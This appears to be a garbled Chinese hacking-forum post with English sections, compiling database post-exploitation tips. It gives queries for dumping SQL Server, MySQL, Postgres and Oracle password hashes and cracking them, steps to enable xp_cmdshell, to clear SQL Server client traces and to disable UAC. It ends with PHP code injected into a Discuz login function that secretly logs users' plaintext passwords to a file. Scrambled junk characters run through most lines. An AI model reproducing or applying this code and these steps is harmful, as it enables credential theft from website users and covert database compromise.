5 ?6 w; b) x+ v9 n. S各种类型数据库抓HASH破解最高权限密码!
5 s* }5 s. P4 F9 ^1.sql server2000
9 `# b( f$ Q$ S) n" o7 {- lSELECT password from master.dbo.sysxlogins where name='sa'7 }" N% [( \9 i8 y; h. A& N# L
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503415 G1 @! _ Q6 b3 _* `" G( V2 L1 \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ P+ |$ |, y( @4 Y# G( X% T
8 v, E$ u/ o! V# H0×0100- constant header" |8 j! \- S2 W( s5 t. O
34767D5C- salt
. ^1 v% y4 Y- R0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash( o. [9 B4 ?7 m# I$ S6 }" }. X
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
2 V& ?5 a! W) Rcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash4 i5 Y9 x; g' k* V- @/ ]9 B
SQL server 2005:-
' x: u+ K; y3 T8 r6 z% ?9 MSELECT password_hash FROM sys.sql_logins where name='sa'" E& Z5 g& M: V! M/ k) S
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
3 ^7 |; S5 d' |' E5 J0×0100- constant header% F- b( I" S$ u+ D/ U, H! w
993BF231-salt$ U6 u( \" w: o4 Y
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
/ q6 |+ R$ {% Acrack case sensitive hash in cain, try brute force and dictionary based attacks.
( ^5 Z0 F+ u' Y0 Q3 j; A4 O
5 r0 D& G8 C1 Qupdate:- following bernardo’s comments:-
0 K5 b" U6 e9 l0 }' _use function fn_varbintohexstr() to cast password in a hex string.
% ~) v# C. j# S: }e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins7 C* |- D, ~' Z& U
' E8 n2 ^ X# a; LMYSQL:-! |0 Y, v: @9 x7 S0 b4 e* q
( \+ {+ l! q6 @$ ]4 jIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
5 D; m; M$ Q( k4 X$ T, T
5 K/ L; r7 [( ^) M*mysql < 4.15 Y. p T5 p( G( } U
. D s' _ [" }& b
mysql> SELECT PASSWORD(‘mypass’);
% s" x" \* m$ z6 a9 g3 \+——————–+
3 M" _1 N/ T2 j7 O) y# A. w| PASSWORD(‘mypass’) |# R6 c! h% R3 D# o9 ]- e9 b5 e7 y, C
+——————–+' U" U5 W# T a2 T# T3 T
| 6f8c114b58f2ce9e |, W# P9 C% N' W$ J. X3 ^ f Q
+——————–+8 g: \5 k! O! \8 y
+ }1 n: E: [) K% C*mysql >=4.1
) x6 f. C! L% a5 ~; h% L8 w6 ?; @+ l# H+ B! a, ^+ e
mysql> SELECT PASSWORD(‘mypass’);. x; H! m* s3 R( d, w$ n
+——————————————-+
. G5 p# s0 W' t9 l| PASSWORD(‘mypass’) |5 q$ v' r( l5 \( w" L* a
+——————————————-+
- q. Y9 N2 G7 F( c; N| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |; {. ]( J: S/ q; _2 u
+——————————————-+
- U0 ~( }- ^8 s2 ^. Q: }4 e$ q( r; K: j( ^/ n! J5 {$ j5 e
Select user, password from mysql.user* [3 I5 `4 q/ D6 Z; s
The hashes can be cracked in ‘cain and abel’4 P: p: F% z4 w0 U# ?
7 c' S. ?. l' u, t. f* S, o$ y
Postgres:-
% X. r* O! R7 w/ y( }( @& PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)3 ~. O: T1 C0 s( E T3 {2 ~9 p/ N4 v
select usename, passwd from pg_shadow;
( u+ Y ?2 U0 V; ^3 ~: }usename | passwd' l7 x6 A7 s% F- K1 R! b
——————+————————————-
' d. I+ j! Q, r E4 u) B- j# Ltestuser | md5fabb6d7172aadfda4753bf0507ed4396% B5 K$ ^5 [; I$ m
use mdcrack to crack these hashes:-
" p2 f7 N3 @; w5 l8 O+ y' |. I% z$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396# i" U- Z& @$ q/ _ X5 m
0 ?! I- y+ ?' M) i
Oracle:-
# ]3 W% k9 m- fselect name, password, spare4 from sys.user$ |; l1 u, i ~8 `1 B
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g0 c+ X; O" y; L; |, t' f6 o8 `, I7 e
More on Oracle later, i am a bit bored….
# b0 t0 ^9 R6 e" l1 Q& x! V/ Y- k) B
, n6 a: K0 E/ k
在sql server2005/2008中开启xp_cmdshell
, u7 @8 H& E: u' C, k9 z( Z-- To allow advanced options to be changed.
; u6 A% c5 {6 p* _6 z1 eEXEC sp_configure 'show advanced options', 1) P N4 I+ Z* a: {
GO0 n; _' G$ N% ^2 C( A5 Q
-- To update the currently configured value for advanced options.7 y6 F/ ?: s% X* i6 L8 \) v: H( t
RECONFIGURE& o7 e8 K$ j$ D: ^9 X7 U
GO
6 z( |* Y& e2 y4 O6 Q-- To enable the feature.- e Y% y6 `( l
EXEC sp_configure 'xp_cmdshell', 14 w2 `3 A E4 z$ }
GO
( ^0 V2 e5 L3 b-- To update the currently configured value for this feature.
# _. V1 F5 [. \' J$ ~! `; {RECONFIGURE# Q" N5 \& E0 u$ L2 E0 [6 e* [, K$ T7 ?
GO$ y) I2 Q/ g% k Y) I) O
SQL 2008 server日志清除,在清楚前一定要备份。- ? Y- X/ L9 S% y% c3 }
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:- Q0 J& a3 t0 G ?7 k
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin- m) Q& w3 ?! ~
9 Q0 H% Y& I2 A* c6 |( k. d
对于SQL Server 2008以前的版本:
- M* U$ R5 d+ f5 H* A0 qSQL Server 2005:% ~* p9 M" ?/ R' j7 t4 f
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat6 d- z! Z3 Z& e& m
SQL Server 2000:' e# C8 U# h y" f, t7 u! N/ B
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。" E7 H) h/ |# u4 D. L7 N2 D; N U
3 z& F0 w$ i' a8 S
本帖最后由 simeon 于 2013-1-3 09:51 编辑
' i, q5 Y6 x8 t$ w' ^; t5 q! _& M$ F# ^, p( J% A: ]
- v& h& K1 ~: [8 ~# g3 ~7 @# \
windows 2008 文件权限修改
3 k, y! }( }8 X) y9 m" p q1 @1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
; ?- Z9 \6 d, Z. m( N7 E9 A, V2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98, l- K1 F! [8 ?% c
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,9 Q0 N4 i# u1 r' i
a$ r- v2 @' y
Windows Registry Editor Version 5.002 E a$ n6 k0 I
[HKEY_CLASSES_ROOT\*\shell\runas]
. l4 K8 v$ ^" S n@="管理员取得所有权"
1 _+ w$ ^' Z. _) k1 k"NoWorkingDirectory"=""
5 ?/ l" `& m* H' d[HKEY_CLASSES_ROOT\*\shell\runas\command]' } j$ f k5 ?& j+ i! _& y" P
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% q; {# d/ Y4 I2 j"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 V8 E3 c8 g) X* `5 E5 ]- w7 W8 w* s[HKEY_CLASSES_ROOT\exefile\shell\runas2]; E( L" S5 u$ Z& Q3 D# m
@="管理员取得所有权") k3 L' P7 O! l( S
"NoWorkingDirectory"=""
3 |! j: ]$ X7 D3 c[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
: S/ M7 |, x4 h. b@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, U& y2 {$ L# O T' u. K0 X4 g"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 v! q7 t. n% J: {* u- b
# ~2 Y0 Y3 n' o3 }) A
[HKEY_CLASSES_ROOT\Directory\shell\runas]
* t( s% T! A5 P3 X@="管理员取得所有权"
- l+ r9 D4 H3 H% O" `9 h"NoWorkingDirectory"=""+ L/ |6 I" i) `4 P' S
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]" W/ e. d1 c; B$ v& P4 [: g
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
* v; K" W2 m2 k( I& Z+ e"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; Y7 @9 ?2 ^+ S& _8 D7 r
9 A/ l1 l" m- R4 s
. T$ V9 `, D7 G, O0 Vwin7右键“管理员取得所有权”.reg导入
+ B" s. k: _& d$ x' d* I二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
. G( s; O8 `7 ~1、C:\Windows这个路径的“notepad.exe”不需要替换
% z7 H1 E, m& s( `6 U' i1 O8 S: P* k2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
: w: H7 Y& s& J- R: \3、四个“notepad.exe.mui”不要管
) M$ |" |4 D0 z, j$ a4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
6 U9 y- H) k. @1 q$ TC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”' M0 i4 o7 { i. ?
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
2 _: N% S; u" p0 L# J4 }替换完之后回到桌面,新建一个txt文档打开看看是不是变了。' S# N) l! x7 L. |' k8 u
windows 2008中关闭安全策略: 1 F/ {5 p7 g, m
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2 E3 F0 q1 _; d5 S5 |4 Y% P5 P& V) x
修改uc_client目录下的client.php 在
6 G) s% S/ q+ z, I) ^6 qfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, T# B( o2 d7 @7 A1 l下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 _8 O0 O4 q% ]& x9 r1 W4 N你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
2 o; T5 ?% O9 O/ f1 Tif(getenv('HTTP_CLIENT_IP')) {
% k* ^* X" P% {9 t" o$onlineip = getenv('HTTP_CLIENT_IP');$ I) L& `: v% A/ B M# }3 e
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* P9 y) d% U5 o* O; c$onlineip = getenv('HTTP_X_FORWARDED_FOR');6 \: O( t; H: @0 d
} elseif(getenv('REMOTE_ADDR')) {( r7 I8 w# y. c; a
$onlineip = getenv('REMOTE_ADDR');
9 x1 \5 i/ L( i} else {
7 E% w# n. ~) C7 B/ @ g& }1 q. Y9 l$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
- Q; H) ]( g, z+ E' y5 j; @}+ |9 q# L; n) g6 k
$showtime=date("Y-m-d H:i:s");
' _& {2 l9 t6 D# ^+ K/ R: S $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 P+ f' [2 [4 Z $handle=fopen('./data/cache/csslog.php','a+');( E1 @3 N+ U$ e, B
$write=fwrite($handle,$record); |